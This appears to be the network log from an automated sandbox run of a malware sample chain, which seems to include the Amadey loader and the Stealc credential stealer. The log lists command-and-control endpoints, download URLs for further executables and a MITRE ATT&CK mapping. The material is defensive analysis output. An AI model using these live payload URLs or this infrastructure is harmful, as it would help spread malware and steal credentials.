x-msedge-ref: Ref A: E1DB01A1810443FBBA1CE1BFDDF6896E Ref B: LON04EDGE0910 Ref C: 2024-09-01T04:42:44Z
date: Sun, 01 Sep 2024 04:42:43 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301651_1F1H60KU4IQQHGWIG&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239317301651_1F1H60KU4IQQHGWIG&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 437121
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9D28D493BDFD46D3988368660DDCBDAD Ref B: LON04EDGE0910 Ref C: 2024-09-01T04:42:44Z
date: Sun, 01 Sep 2024 04:42:43 GMT

185.215.113.16:80

http://185.215.113.16/Jo89Ku7d/index.php

http

axplong.exe

260.7kB
7.6MB
5496
5480

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

GET http://185.215.113.16/inc/crypteda.exe

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

GET http://185.215.113.16/inc/stealc_default2.exe

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

GET http://185.215.113.16/inc/Amadeus.exe

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

GET http://185.215.113.16/inc/runtime.exe

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200
150.171.28.10:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=80d6e392998e4ff9bf5d01d2a8657991&localId=w:BB8B17D4-59B3-6ACA-B6DD-FE09489D2C70&deviceId=6896205358085503&anid=

tls, http2

2.0kB
9.3kB
21
18

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=80d6e392998e4ff9bf5d01d2a8657991&localId=w:BB8B17D4-59B3-6ACA-B6DD-FE09489D2C70&deviceId=6896205358085503&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=80d6e392998e4ff9bf5d01d2a8657991&localId=w:BB8B17D4-59B3-6ACA-B6DD-FE09489D2C70&deviceId=6896205358085503&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=80d6e392998e4ff9bf5d01d2a8657991&localId=w:BB8B17D4-59B3-6ACA-B6DD-FE09489D2C70&deviceId=6896205358085503&anid=

HTTP Response

204
54.247.69.169:80

http://ddl.safone.dev/3840509/build.exe?hash=AgADNB

http

axplong.exe

798.5kB
24.0MB
17191
17189

HTTP Request

GET http://ddl.safone.dev/3823166/crypted.exe?hash=AgADZl

HTTP Response

500

HTTP Request

GET http://ddl.safone.dev/3840366/Setup.exe?hash=AgADSh

HTTP Response

500

HTTP Request

GET http://ddl.safone.dev/3840528/BitcoinCore.exe?hash=AgADrH

HTTP Response

200

HTTP Request

GET http://ddl.safone.dev/3830515/PureSyncInst.exe?hash=AgADvR

HTTP Response

200

HTTP Request

GET http://ddl.safone.dev/3840509/build.exe?hash=AgADNB

HTTP Response

500
185.215.113.26:80

http://185.215.113.26/Nework.exe

http

axplong.exe

15.0kB
439.0kB
326
318

HTTP Request

GET http://185.215.113.26/Nework.exe

HTTP Response

200
185.215.113.26:80

http://185.215.113.26/Dem7kTu/index.php

http

Hkbsse.exe

1.1kB
667 B
14
6

HTTP Request

POST http://185.215.113.26/Dem7kTu/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.26/Dem7kTu/index.php

HTTP Response

200
185.215.113.17:80

http://185.215.113.17/2fb6c2cc8dce150a.php

http

stealc_default2.exe

198.3kB
5.4MB
3919
3908

HTTP Request

GET http://185.215.113.17/

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

GET http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

GET http://185.215.113.17/f1ddeb6592c03206/freebl3.dll

HTTP Response

200

HTTP Request

GET http://185.215.113.17/f1ddeb6592c03206/mozglue.dll

HTTP Response

200

HTTP Request

GET http://185.215.113.17/f1ddeb6592c03206/msvcp140.dll

HTTP Response

200

HTTP Request

GET http://185.215.113.17/f1ddeb6592c03206/nss3.dll

HTTP Response

200

HTTP Request

GET http://185.215.113.17/f1ddeb6592c03206/softokn3.dll

HTTP Response

200

HTTP Request

GET http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200
65.21.18.51:45580

esuXM2mLD0.exe

2.8MB
41.9kB
2059
823
95.216.107.53:12311

BVoLOJehKw.exe

2.9MB
45.2kB
2240
752
104.21.53.180:443

https://fastcareasy.store/does-tim-rozon-sing?ukfcmqc3u=DjWDFxEj2%2FJOST%2FfYfvu8KeOOhazrTE5qan0pWAmsD53LTufA8izkzEG9WYbze6DJ5BJFMzLUVqogbE1TtwO2A%3D%3D

tls, http

BitcoinCore.exe

1.2kB
4.2kB
10
9

HTTP Request

POST https://fastcareasy.store/does-tim-rozon-sing?ukfcmqc3u=DjWDFxEj2%2FJOST%2FfYfvu8KeOOhazrTE5qan0pWAmsD53LTufA8izkzEG9WYbze6DJ5BJFMzLUVqogbE1TtwO2A%3D%3D

HTTP Response

204
185.215.113.19:80

http://185.215.113.19/CoreOPT/index.php

http

RegAsm.exe

782 B
827 B
7
6

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200
185.215.113.19:80

http://185.215.113.19/CoreOPT/index.php

http

RegAsm.exe

245.6kB
40.9kB
3527
614

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php?scr=1

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200
185.215.113.16:80

http://185.215.113.16/inc/ovrflw.exe

http

RegAsm.exe

232.8kB
5.7MB
4114
4103

HTTP Request

GET http://185.215.113.16/inc/ovrflw.exe

HTTP Response

200
172.67.195.247:443

https://tmpfiles.org/dl/12052740/dropper.exe

tls, http

RegAsm.exe

1.3kB
12.4kB
20
18

HTTP Request

GET https://tmpfiles.org/dl/12052740/dropper.exe

HTTP Response

404
142.250.178.3:80

http://c.pki.goog/r/r4.crl

http

RegAsm.exe

510 B
3.8kB
6
5

HTTP Request

GET http://c.pki.goog/r/gsr1.crl

HTTP Response

200

HTTP Request

GET http://c.pki.goog/r/r4.crl

HTTP Response

200
172.67.207.182:443

https://locatedblsoqp.shop/api

tls, http

BitLockerToGo.exe

1.7kB
10.0kB
14
16

HTTP Request

POST https://locatedblsoqp.shop/api

HTTP Response

200

HTTP Request

POST https://locatedblsoqp.shop/api

HTTP Response

200
104.21.84.66:443

https://millyscroqwp.shop/api

tls, http

BitLockerToGo.exe

1.0kB
4.6kB
9
9

HTTP Request

POST https://millyscroqwp.shop/api

HTTP Response

200
172.67.207.182:443

https://locatedblsoqp.shop/api

tls, http

BitLockerToGo.exe

1.7kB
10.0kB
14
16

HTTP Request

POST https://locatedblsoqp.shop/api

HTTP Response

200

HTTP Request

POST https://locatedblsoqp.shop/api

HTTP Response

200
104.21.84.66:443

https://millyscroqwp.shop/api

tls, http

BitLockerToGo.exe

1.0kB
4.6kB
9
9

HTTP Request

POST https://millyscroqwp.shop/api

HTTP Response

200
172.67.207.182:443

https://locatedblsoqp.shop/api

tls, http

BitLockerToGo.exe

1.7kB
10.0kB
15
17

HTTP Request

POST https://locatedblsoqp.shop/api

HTTP Response

200

HTTP Request

POST https://locatedblsoqp.shop/api

HTTP Response

200
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.28.10:443

https://tse1.mm.bing.net/th?id=OADD2.10239317301651_1F1H60KU4IQQHGWIG&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

tls, http2

116.6kB
3.4MB
2477
2475

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360505011_123FH55PMWQ5EA6JP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301242_1SRW05UUR0YI3F1X9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360504960_1PLAHYZB4JQO28JRC&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418543_1PQIQEA9PYCCTOZ9T&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418544_1U65HGUXV07UFEU5B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301651_1F1H60KU4IQQHGWIG&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Response

200

8.8.8.8:53

149.220.183.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

149.220.183.52.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

g.bing.com

dns

56 B
148 B
1
1

DNS Request

g.bing.com

DNS Response

150.171.28.10

150.171.27.10
8.8.8.8:53

16.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

16.113.215.185.in-addr.arpa
8.8.8.8:53

68.32.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

68.32.126.40.in-addr.arpa
8.8.8.8:53

ddl.safone.dev

dns

axplong.exe

60 B
175 B
1
1

DNS Request

ddl.safone.dev

DNS Response

54.247.69.169

52.212.52.84

63.32.161.232
8.8.8.8:53

169.69.247.54.in-addr.arpa

dns

72 B
135 B
1
1

DNS Request

169.69.247.54.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

133.211.185.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

133.211.185.52.in-addr.arpa
8.8.8.8:53

26.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

26.113.215.185.in-addr.arpa
8.8.8.8:53

17.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

17.113.215.185.in-addr.arpa
8.8.8.8:53

51.18.21.65.in-addr.arpa

dns

70 B
125 B
1
1

DNS Request

51.18.21.65.in-addr.arpa
8.8.8.8:53

53.107.216.95.in-addr.arpa

dns

72 B
129 B
1
1

DNS Request

53.107.216.95.in-addr.arpa
8.8.8.8:53

86.23.85.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

86.23.85.13.in-addr.arpa
8.8.8.8:53

15.164.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

15.164.165.52.in-addr.arpa
8.8.8.8:53

65.139.73.23.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

65.139.73.23.in-addr.arpa
8.8.8.8:53

fastcareasy.store

dns

BitcoinCore.exe

63 B
95 B
1
1

DNS Request

fastcareasy.store

DNS Response

104.21.53.180

172.67.216.26
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

180.53.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

180.53.21.104.in-addr.arpa
8.8.8.8:53

43.58.199.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

43.58.199.20.in-addr.arpa
8.8.8.8:53

19.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

19.113.215.185.in-addr.arpa
8.8.8.8:53

tmpfiles.org

dns

RegAsm.exe

58 B
90 B
1
1

DNS Request

tmpfiles.org

DNS Response

172.67.195.247

104.21.21.16
8.8.8.8:53

c.pki.goog

dns

RegAsm.exe

56 B
107 B
1
1

DNS Request

c.pki.goog

DNS Response

142.250.178.3
8.8.8.8:53

247.195.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

247.195.67.172.in-addr.arpa
8.8.8.8:53

3.178.250.142.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

3.178.250.142.in-addr.arpa
8.8.8.8:53

evoliutwoqm.shop

dns

BitLockerToGo.exe

62 B
62 B
1
1

DNS Request

evoliutwoqm.shop
8.8.8.8:53

locatedblsoqp.shop

dns

BitLockerToGo.exe

64 B
96 B
1
1

DNS Request

locatedblsoqp.shop

DNS Response

172.67.207.182

104.21.58.213
8.8.8.8:53

182.207.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

182.207.67.172.in-addr.arpa
8.8.8.8:53

millyscroqwp.shop

dns

BitLockerToGo.exe

63 B
95 B
1
1

DNS Request

millyscroqwp.shop

DNS Response

104.21.84.66

172.67.187.171
8.8.8.8:53

66.84.21.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

66.84.21.104.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
170 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

150.171.28.10

150.171.27.10
8.8.8.8:53

88.156.103.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

88.156.103.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion